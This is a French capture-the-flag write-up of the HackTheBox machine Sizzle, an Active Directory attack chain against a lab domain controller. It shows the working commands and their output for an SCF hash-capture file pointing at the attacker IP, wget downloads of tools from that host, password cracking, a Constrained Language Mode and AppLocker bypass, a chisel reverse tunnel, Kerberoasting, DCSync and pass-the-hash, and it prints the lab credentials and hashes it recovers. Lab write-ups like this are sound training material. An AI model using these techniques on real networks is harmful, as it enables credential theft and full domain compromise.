HackThebox - Sizzle

Posted on Thu, Apr 14, 2022 Writeup HackTheBox ADCS SCF CLM AppLocker Kerberoasting Active Directory

Info card

Port Scanning

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2022-04-13T19:49:12+00:00; -1h43m12s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2022-04-12T09:05:33
|_Not valid after:  2023-04-12T09:05:33
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
|_ssl-date: 2022-04-13T19:49:11+00:00; -1h43m13s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_  Potentially risky methods: TRACE
| tls-alpn:
|   h2
|_  http/1.1
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2022-04-12T09:05:33
|_Not valid after:  2023-04-12T09:05:33
|_ssl-date: 2022-04-13T19:49:11+00:00; -1h43m13s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2022-04-13T19:49:12+00:00; -1h43m12s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2022-04-12T09:05:33
|_Not valid after:  2023-04-12T09:05:33
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2022-04-13T19:49:11+00:00; -1h43m13s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2022-04-12T09:05:33
|_Not valid after:  2023-04-12T09:05:33
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2022-04-13T19:49:11+00:00; -1h43m13s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2022-04-12T09:05:33
|_Not valid after:  2023-04-12T09:05:33
| tls-alpn:
|   h2
|_  http/1.1
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49687/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  msrpc         Microsoft Windows RPC
49705/tcp open  msrpc         Microsoft Windows RPC
49710/tcp open  msrpc         Microsoft Windows RPC
49717/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1h43m12s, deviation: 0s, median: -1h43m13s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-04-13T19:48:28
|_  start_date: 2022-04-12T01:15:17

SMB Reconaissance

Nous pouvons accéder au partage de fichiers via un guest

$ smbclient.py htb.local/'guest':''@sizzle.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
Type help for list of commands
# shares
ADMIN$
C$
CertEnroll
Department Shares
IPC$
NETLOGON
Operations
SYSVOL

Afin de voir les permissions que nous possédons je vais utiliser crackmapexec

cme smb sizzle.htb -u 'guest' -p '' --shares
SMB         sizzle.htb      445    SIZZLE           [*] Windows 10.0 Build 14393 x64 (name:SIZZLE) (domain:HTB.LOCAL) (signing:True) (SMBv1:False)
SMB         sizzle.htb      445    SIZZLE           [+] HTB.LOCAL\guest:
SMB         sizzle.htb      445    SIZZLE           [+] Enumerated shares
SMB         sizzle.htb      445    SIZZLE           Share           Permissions     Remark
SMB         sizzle.htb      445    SIZZLE           -----           -----------     ------
SMB         sizzle.htb      445    SIZZLE           ADMIN$                          Remote Admin
SMB         sizzle.htb      445    SIZZLE           C$                              Default share
SMB         sizzle.htb      445    SIZZLE           CertEnroll                      Active Directory Certificate Services share
SMB         sizzle.htb      445    SIZZLE           Department Shares READ
SMB         sizzle.htb      445    SIZZLE           IPC$            READ            Remote IPC
SMB         sizzle.htb      445    SIZZLE           NETLOGON                        Logon server share
SMB         sizzle.htb      445    SIZZLE           Operations
SMB         sizzle.htb      445    SIZZLE           SYSVOL                          Logon server share

Nous avons la possibilité de read sur les share Department Shares et IPC$.

Accédons sans plus tarder au share Department Shares

smbclient -U 'guest%' //10.10.10.103/'Department Shares'
Can't load /etc/samba/smb.conf - run testparm to debug it
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Jul  3 15:22:32 2018
  ..                                  D        0  Tue Jul  3 15:22:32 2018
  Accounting                          D        0  Mon Jul  2 19:21:43 2018
  Audit                               D        0  Mon Jul  2 19:14:28 2018
  Banking                             D        0  Tue Jul  3 15:22:39 2018
  CEO_protected                       D        0  Mon Jul  2 19:15:01 2018
  Devops                              D        0  Mon Jul  2 19:19:33 2018
  Finance                             D        0  Mon Jul  2 19:11:57 2018
  HR                                  D        0  Mon Jul  2 19:16:11 2018
  Infosec                             D        0  Mon Jul  2 19:14:24 2018
  Infrastructure                      D        0  Mon Jul  2 19:13:59 2018
  IT                                  D        0  Mon Jul  2 19:12:04 2018
  Legal                               D        0  Mon Jul  2 19:12:09 2018
  M&A                                 D        0  Mon Jul  2 19:15:25 2018
  Marketing                           D        0  Mon Jul  2 19:14:43 2018
  R&D                                 D        0  Mon Jul  2 19:11:47 2018
  Sales                               D        0  Mon Jul  2 19:14:37 2018
  Security                            D        0  Mon Jul  2 19:21:47 2018
  Tax                                 D        0  Mon Jul  2 19:16:54 2018
  Users                               D        0  Tue Jul 10 21:39:32 2018
  ZZ_ARCHIVE                          D        0  Mon Jul  2 19:32:58 2018

Il référence plusieurs dossiers, en faisant un ls récursif nous nous rendons compte qu’il n’y a pas grand-chose a par une liste d’utilisateurs que je garderai de coté:

\Users
  .                                   D        0  Tue Jul 10 21:39:32 2018
  ..                                  D        0  Tue Jul 10 21:39:32 2018
  amanda                              D        0  Mon Jul  2 19:18:43 2018
  amanda_adm                          D        0  Mon Jul  2 19:19:06 2018
  bill                                D        0  Mon Jul  2 19:18:28 2018
  bob                                 D        0  Mon Jul  2 19:18:31 2018
  chris                               D        0  Mon Jul  2 19:19:14 2018
  henry                               D        0  Mon Jul  2 19:18:39 2018
  joe                                 D        0  Mon Jul  2 19:18:34 2018
  jose                                D        0  Mon Jul  2 19:18:53 2018
  lkys37en                            D        0  Tue Jul 10 21:39:04 2018
  morgan                              D        0  Mon Jul  2 19:18:48 2018
  mrb3n                               D        0  Mon Jul  2 19:19:20 2018
  Public                              D        0  Wed Sep 26 05:45:32 2018

Quelque chose d’intéressant est le répertoire Public et partagé, étant donnée que les ACE définit la possibilité d’écriture pour tout le monde nous avons les droits d’écriture dessus nous pouvons tenter de faire une Scf file attaque

Scf File Attack on smb share

On va générer un fichier .scf avec cette forme ci-dessous:

[Shell]
Command=2
IconFile=\\10.10.14.4\share\cat.ico
[Taskbar]
Command=ToggleDesktop

Et nous pouvons upload ce fichier sur le share et prier pour qu’un utilisateur clique dessus.

[SMB] NTLMv2-SSP Client   : ::ffff:10.10.10.103
[SMB] NTLMv2-SSP Username : HTB\amanda
[SMB] NTLMv2-SSP Hash     : amanda::HTB:f6ca880f7eab34c3:98D0937FFDE6F5D83B0F646FA45075EF:01010000000000000069E44B834FD801D6C168B500B55C220000000002000800530045004B00560001001E00570049004E002D004D0033004F004C004E0059005900570053004D00440004003400570049004E002D004D0033004F004C004E0059005900570053004D0044002E00530045004B0056002E004C004F00430041004C0003001400530045004B0056002E004C004F00430041004C0005001400530045004B0056002E004C004F00430041004C00070008000069E44B834FD801060004000200000008003000300000000000000001000000002000006633CE1763E326C16961BD06BC1DCBC31C9E617F32A2FA06E32F3282257E44140A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003400000000000000000000000000

Super ! Nous récupérons le hash netNTLMv2 de amanda (sa réponse au challenge lors de l’auth ntlm)

Nous pouvons tenter de crack la hash avec john

Cracking NetNTLMv2 amanda hash

john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --format=netntlmv2 hash_amanda.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:01:12 63,74% (ETA: 22:20:58) 0g/s 126546p/s 126546c/s 126546C/s chelle97..cheer437
Ashare1972       (amanda)
1g 0:00:01:25 DONE (2022-04-13 22:20) 0.01169g/s 133571p/s 133571c/s 133571C/s Ashia12..[email protected]
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
john hash_amanda.txt --show
amanda:Ashare1972:HTB:f6ca880f7eab34c3:98D0937FFDE6F5D83B0F646FA45075EF:01010000000000000069E44B834FD801D6C168B500B55C220000000002000800530045004B00560001001E00570049004E002D004D0033004F004C004E0059005900570053004D00440004003400570049004E002D004D0033004F004C004E0059005900570053004D0044002E00530045004B0056002E004C004F00430041004C0003001400530045004B0056002E004C004F00430041004C0005001400530045004B0056002E004C004F00430041004C00070008000069E44B834FD801060004000200000008003000300000000000000001000000002000006633CE1763E326C16961BD06BC1DCBC31C9E617F32A2FA06E32F3282257E44140A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003400000000000000000000000000

Le mot de passe de amanda est Ashare1972

Amanda credentials enumeration

Nous pouvons faire un cme pour voir c’est permissions sur le partage de fichiers

cme smb sizzle.htb -u 'amanda' -p 'Ashare1972' --shares
SMB         sizzle.htb      445    SIZZLE           [*] Windows 10.0 Build 14393 x64 (name:SIZZLE) (domain:HTB.LOCAL) (signing:True) (SMBv1:False)
SMB         sizzle.htb      445    SIZZLE           [+] HTB.LOCAL\amanda:Ashare1972
SMB         sizzle.htb      445    SIZZLE           [+] Enumerated shares
SMB         sizzle.htb      445    SIZZLE           Share           Permissions     Remark
SMB         sizzle.htb      445    SIZZLE           -----           -----------     ------
SMB         sizzle.htb      445    SIZZLE           ADMIN$                          Remote Admin
SMB         sizzle.htb      445    SIZZLE           C$                              Default share
SMB         sizzle.htb      445    SIZZLE           CertEnroll      READ            Active Directory Certificate Services share
SMB         sizzle.htb      445    SIZZLE           Department Shares READ
SMB         sizzle.htb      445    SIZZLE           IPC$            READ            Remote IPC
SMB         sizzle.htb      445    SIZZLE           NETLOGON        READ            Logon server share
SMB         sizzle.htb      445    SIZZLE           Operations
SMB         sizzle.htb      445    SIZZLE           SYSVOL          READ            Logon server share

Nous possédons un peu plus de permissions notamment sur le CertEnroll share.

Le fait que ce share est présent nous donne une information clé sur l’infrastructure (AD CS)

Étant donné qu’il est présent sur le serveur web nous pouvons guess la présence du répertoire certsrv

Certificate generation, uses via evil-winrm

Nous pouvons utiliser les creds de amanda pour nous log et généré un certificat via une clé privée que nous allons générer.

Pour générér ce certificat nous avons besoin de créer un certificate request pour l’utiliser avec le CA.

Du coup générons une clé privée:

sudo openssl genrsa -out amanda.key 2048

Puis générons le csr (certificate request) à partir de la clé:

sudo openssl req –new –key amanda.key –out amanda.csr

Nous pouvons request un certificat

Utilisons le pour nous connecter via evil-winrm en spécifiant la clé privé et le certificat

sudo evil-winrm -i 10.10.10.103 -u 'amanda' -p 'Ashare1972' -k amanda.key -c amanda.cer -S

Bypass CLM (Constrained Langage Mode)

Petit problème ! En regardant l’état du langage appliqué sur powershell nous nous rendons compte qu’il est constrained . C’est plutôt embêtant pour bypass l’amsi et d’autres détails tel que exécuter des commandes d’énumérations.

*Evil-WinRM* PS C:\Users\amanda\Desktop> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage

Pour le bypass je vais utiliser une technique qui s’appelle le Powershell Downgrade ça permet tout simplement de baisser la version du powershell utilisé

powershell -v 2 -ep bypass -command "whoami"

Nous passons à une version antérieure de powershell pour exécuter des commandes

Nous pouvons transférer sharphound et powerview pour énumérer l’environement AD et trouver un moyen de passer Domain Admins

wget http://10.10.14.4:4445/PowerView.ps1 -O PowerView.ps1
wget http://10.10.14.4:4445/SharpHound.exe -O SharpHound.exe

Sauf que de nouveau nous avons un problème lors de l’éxécution de sharphound nous avons une érreur

Program 'SharpHound.exe' failed to execute: This program is blocked by group policy.

On se fait bloquer par les règles du local security policy il semble que SharpHound est bloqué par les group policy

Applocker Policy Bypass

Les règles AppLocker par défaut autorisent l'exécution de tous les fichiers contenus dans le dossier Windows et les fichiers programme, sinon le système ne fonctionnera pas normalement. Si les autorisations appropriées ne sont pas définies dans ces dossiers, un attaquant pourrait exploiter cela afin de contourner AppLocker.

Nous pouvons essayer d’utiliser accesschk.exe mais il est aussi bloqué par appLocker

Wayback Machine

The Wayback Machine - https://web.archive.org/web/20111111130246/http://live.sysinternals.com/accesschk.exe

Sinon nous pouvons utiliser ce script powershell:

powershell -ExecutionPolicy Bypass -File .\applocker-bypas-checker.ps1
[*] Processing folders recursively in C:\windows
...
C:\Windows\Temp
C:\windows\tracing
C:\Windows\System32\spool\drivers\color
...

Par défaut il y’a plusieur path accessible en écriture par un utilisateur normal les voicis:

C:\Windows\Tasks 

C:\Windows\Temp 

C:\windows\tracing

C:\Windows\Registration\CRMLog

C:\Windows\System32\FxsTmp

C:\Windows\System32\com\dmp

C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys

C:\Windows\System32\spool\PRINTERS

C:\Windows\System32\spool\SERVERS

C:\Windows\System32\spool\drivers\color

C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter

C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)

C:\Windows\SysWOW64\FxsTmp

C:\Windows\SysWOW64\com\dmp

C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter

C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System

Le dossier temp est fonctionelle mais nous n’avons pas les droits de lecture dessus. Donc impossible de retrouver l’output de SharpHound, nous pouvons utiliser le dossier C:\windows\tracing qui lui possède touts les accès nécéssaires.

PS C:\windows\tracing> .\SharpHound.exe -c all,loggedon
...
PS C:\windows\tracing> download 20220414114737_BloodHound.zip

Bien on aurait pu utiliser bloodhound-python pour le faire en remote, dans ce cas on n'aurait pas eu besoin de bypass le CLM et AppLocker.

bloodhound-python -u 'amanda' -p 'Ashare1972' -c all,loggedon -ns 10.10.10.103 -d htb.local

On peu download le zip file pour l’analyser en local.

Kerberoasting + DCSync

On peut constater que l’utilisateur MRLKY est kerberoastable, et il possède aussi les droit DCsync sur HTB.local

Par contre sur le scan de port il n’y avait pas de service kerberos, en vérifiant en local on s’aperçoit bien qu’il y a un port 88 (port par défaut de kerberos)

On peut essayer de forward le port sur notre localhost, pour cela je vais utiliser chisel

Release v1.7.3 · jpillora/chisel

You can't perform that action at this time. You signed in with another tab or window. You signed out in another tab or window. Reload to refresh your session. Reload to refresh your session.

sudo ./chisel_1.7.6_linux_amd64 server-p 8000 --reverse
2022/04/14 19:27:35 server: Reverse tunnelling enabled
2022/04/14 19:27:35 server: Fingerprint fEDfYpYEcpOruH/b1HphRaYeoNWzK/rcL2ihiZ2+Do4=
2022/04/14 19:27:35 server: Listening on http://0.0.0.0:8000
2022/04/14 19:27:40 server: session#1: Client version (1.7.3) differs from server version (1.7.6)
2022/04/14 19:27:40 server: session#1: tun: proxy#R:88=>88: Listening
\chisel_1.7.3_windows_amd64.exe client 10.10.14.4:8000 R:88:127.0.0.1:88 R:389:127.0.0.1:389
chisel_1.7.3_windows_amd64.exe : 2022/04/14 13:44:28 client: Connecting to ws://10.10.14.4:8000
    + CategoryInfo          : NotSpecified: (2022/04/14 13:4...10.10.14.4:8000:String)[], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
2022/04/14 13:44:29 client: Connected (Latency 79.3047ms)

Il est important de forward ldap sinon l’attaque ne fonctionnera pas en local.

On voit qu’il y a bien un service sur le port 88 sur notre localhost:

$ ss -pulnt | grep 88
tcp   LISTEN 0      4096                    *:88               *:*

Vérifions que c’est bien du kerberos:

nmap -p 88 127.0.0.1
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-14 19:28 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000047s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec

Nmap done: 1 IP address (1 host up) scanned in 0.88 seconds

Super ! Maintenant procédons au kerberoasting.

Nous aurons besoin du time du DC pour nous synchroniser avec lui:

net time -S 10.10.10.103
Thu Apr 14 17:56:44 2022

Puis utilisons GetUserSPNs de la suite impacket pour récupérer les Service Principal Names qui sont associés aux comptes d'utilisateurs. Ce qui est renvoyé est un ticket qui est chiffré avec le mot de passe du compte utilisateur.

faketime "2022-04-14 17:58:00" GetUserSPNs.py -request -dc-ip 127.0.0.1 HTB.local/amanda:'Ashare1972'

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name   MemberOf                                               PasswordLastSet             LastLogon                   Delegation
--------------------  -----  -----------------------------------------------------  --------------------------  --------------------------  ----------
http/sizzle           mrlky  CN=Remote Management Users,CN=Builtin,DC=HTB,DC=LOCAL  2018-07-10 18:08:09.536421  2018-07-12 14:23:50.871575



$krb5tgs$23$*mrlky$HTB.LOCAL$HTB.local/mrlky*$9540691372ca7c65c1e35644267e1744$718437bda88e9b930d820d98bea6e7abbb29ac16a76c801f747faf1b7dce3ccab6e2d9be444eeb048e0cebf1f3b82e304a8104701ce0c3a9940156219c1da4f0828babe5a620f95c9f9877560679aff58cf77be5d24316ee2891e9850ec97a50e84b8e6550d57d78daa092cceaf0524a603feb10c73854d447f105cab632f2c45450cf93fca37ba6b62e4983315934494ac27d93ce685585b479694ae824f5c42c68cdbc2355ace302388dc0f7725601d7297fd2bf64f7155669367ae1e63a333c0ab8c41590ba788e808cbb3003cf3f64a84bdbe9f0959c630628bfedb0ba04cc8a1e9ef92da9776384574dc3c23999515da3f4dcd24e3bdb03043f34764cc853cf8be5675de27eb99e83667d54dd9c8c46c917267e85ea055db349934fea985f5661f44e54e712c29a6f52d0381a4e8b8b58e9b1d1aae930721d117cc89103845629e5f4358abd57a840807c7ecdddc4ed1ee2d86d8caf170774de2755508c9ea2a024638e103eaa4730d9e663a8f8caa67c2256992bc1a0079f56d4507e134e6e78deaddea241f2bbc5d250a3466f269313b3d5bdb73846323bd6ecada1cf836dcd500fcb291c2450eb77e0bd7d5cff1481ed023b7582005a4d588a651317cd167463e24d8151acbc5bad7d928c6a9244af622ff1bc519cd2bb0d1bc4809f5d48d24edff1b75c0f45c1e9500e62737aad15e7648828d398c4839bbdc34dc4bea539ea374f30abaca6b1cc7502e17201e9dd946612182f12e93569c43697555916d2eb3b2693b6be957b20df29dead97a09d67b540c094fc45ad462b363ddbcac03f5d6ecb310f6fbd8aba58a384e2c1e99b530bfd40f393fde72593fc2e16d50b72605333737918b6196325b472a413594e5b708cb90c7337d30ad041981faf9a4c67794500589a426281148f76ea093e3a59b1ebbe075fd9a09b8c4fcdfd7abe600a2101b094c16d825c432b287695d7bf9714a2eca3c90087c6cc50fdcc62a31a1436cf975786967e98505c1eaec2a17c79dead63415b16755bd37faa9489a48699243fa795c8f1db864cbe3fa9a612529bdbaa21e7035698ed76334b2730fcded00443a90c78754b1f4dffd29a9c9bea2618ec59bdb19ab45e69bdbb9a69ed77dc0619a44abea5add8d393a82c452a1383a04d288ed8dbc158988c276e1e33c18f6fc7a84576ab69f3792c8541c39ca386f7e894c10e8c880dac2cca8f2000456b57118f0def9aac0b86bcaa2aefc47ca840a220a5

Nous récupérons le tgs que nous allons crack avec john

john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --format=krb5tgs hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Football#7       (?)
1g 0:00:00:57 DONE (2022-04-14 19:44) 0.01739g/s 194257p/s 194257c/s 194257C/s Forever29Life05..Fire422
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Super ! Nous avons réussi a le crack nous récupérons le mot de passe de MRLKY qui est Football#7

Terminons par un joli DCSync des familles:

secretsdump.py 'mrlky':'Football#7'@sizzle.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267:::

On récupère le hash nt de l’administrateur et nous pouvons psexec.

psexec.py HTB.local/'Administrator'@10.10.10.103 -hashes ':f6b7160bfc91823792e0ac3a162c9267'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.103.....
[*] Found writable share ADMIN$
[*] Uploading file RZiyrnwJ.exe
[*] Opening SVCManager on 10.10.10.103.....
[*] Creating service nACn on 10.10.10.103.....
[*] Starting service nACn.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
Owned Sizzle from Hack The Box!

I have just owned machine Sizzle from Hack The Box